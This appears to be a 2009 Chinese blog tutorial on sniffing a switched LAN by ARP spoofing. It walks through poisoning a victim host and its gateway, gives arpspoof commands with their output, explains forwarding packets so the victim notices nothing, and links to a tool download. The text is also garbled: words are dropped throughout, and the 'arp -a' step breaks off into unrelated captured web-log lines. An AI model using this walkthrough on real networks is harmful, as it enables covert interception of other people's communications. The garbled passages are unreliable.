sniffer:交换环境下的Sniffer

on 2009-9-12 in 安全 | 0 Comment
通常在局域网环境中我们都是通过交换环境网关上网在交换环境中使用NetXray或者NAI Snfer嗅探工具除了抓到自己包以外是不能看到其他主机网络通信

但是我们可以通过利用ARP欺骗可以实现Snfer

ARP协议是将IP解析为MAC地址协议局域网中通信都是基于MAC

例如下面这样情况:

在局域网中192.168.0.24和192.168.0.29都是通过网关192.168.0.1上网假定攻击者系统为192.168.0.24他希望听到192.168.0.29通信那么我们就可以利用ARP欺骗实现

1、 首先告诉192.168.0.29网关192.168.0.1MAC地址是192.168.0.24

2、 告诉192.168.0.1192.168.0.29MAC地址是192.168.0.24

这样192.168.0.29和192.168.0.1的间数据包就会发给192.168.0.24也就是攻击者机器这样就可以听到会话了但是这么做个问题192.168.0.29发现自己不能上网了原来发给192.168.0.1数据包都被192.168.0.24接收了而并没有发给网关192.168.0.1

这时候192.168.0.24设置个包转发东西就可以解决这个问题了也就是从192.168.0.29收到包转发给192.168.0.1在把从192.168.0.1收到包发给192.168.0.29这样192.168.0.29根本就不会意识到自己被监听了

具体实现:

1、 欺骗192.168.0.29告诉这台机器网关192.168.0.1MAC地址是自己(192.168.0.24)

[root@Linux dsnf-2.3]# ./arpspoof -i eth0 -t 192.168.0.29 192.168.0.1

0:50:56:40:7:71 0:0:86:61:6b:4e 0806 42: arp reply 192.168.0.1 is-at 0:50:56:40:7:71

0:50:56:40:7:71 0:0:86:61:6b:4e 0806 42: arp reply 192.168.0.1 is-at 0:50:56:40:7:71

0:50:56:40:7:71 0:0:86:61:6b:4e 0806 42: arp reply 192.168.0.1 is-at 0:50:56:40:7:71

0:50:56:40:7:71 0:0:86:61:6b:4e 0806 42: arp reply 192.168.0.1 is-at 0:50:56:40:7:71

0:0:21:0:0:18 0:0:86:61:6b:4e 0806 42: arp reply 192.168.0.1 is-at 0:0:21:0:0:18

………………………………..

这时候对192.168.0.29ARP欺骗就开始了

2、 欺骗192.168.0.1告诉网关192.168.0.29MAC地址是自己(192.168.0.24)

[root@Linux dsnf-2.3]# ./arpspoof -i eth0 -t 192.168.0.1 192.168.0.29

0:50:56:40:7:71 0:0:21:0:0:18 0806 42: arp reply 192.168.0.29 is-at 0:50:56:40:7:71

0:50:56:40:7:71 0:0:21:0:0:18 0806 42: arp reply 192.168.0.29 is-at 0:50:56:40:7:71

0:50:56:40:7:71 0:0:21:0:0:18 0806 42: arp reply 192.168.0.29 is-at 0:50:56:40:7:71

0:0:86:61:6b:4e 0:0:21:0:0:18 0806 42: arp reply 192.168.0.29 is-at 0:0:86:61:6b:4e

0:0:86:61:6b:4e 0:0:21:0:0:18 0806 42: arp reply 192.168.0.29 is-at 0:0:86:61:6b:4e

0:0:86:61:6b:4e 0:0:21:0:0:18 0806 42: arp reply 192.168.0.29 is-at 0:0:86:61:6b:4e

其实在这个时候192.168.0.29是可以发现自己被欺骗了在CMD下面使用ARP –a命令:

C:\WINNT>arp -a

Interface: 192.168.0.29 _disibledevent=>
Kitty - - [18/May/2002:20:02:28 +1100] "GEThttp://www.ezboard.com/ztyles/default.css HTTP/1.1" - - "http://pub72.ezboard.com/flasile15596frm1.showAddReplyScreenFromWeb?topicID=29.topic&index=7" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"

Kitty - - [18/May/2002:20:02:29 +1100] "GEThttp://www1.ezboard.com/spch.js?customerid=1147458082 HTTP/1.1" - - "http://pub72.ezboard.com/flasile15596frm1.showAddReplyScreenFromWeb?topicID=29.topic&index=7" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"

当然也可以知道其他………:-)

整个过程需要在Linux下面实现所用到所有工具可以http://www.piaoye.net/downsnfer/arpsnfer.zip下载(2.98 MB) 


  • 篇文章: Windows 2000服务器安全防护林

  • 篇文章: 局域网络病毒入侵原理及其防范思路方法
    • Tags:  snifferpro4.7.5 antiarpsniffer snifferpro sniffer

    延伸阅读

    最新评论

    发表评论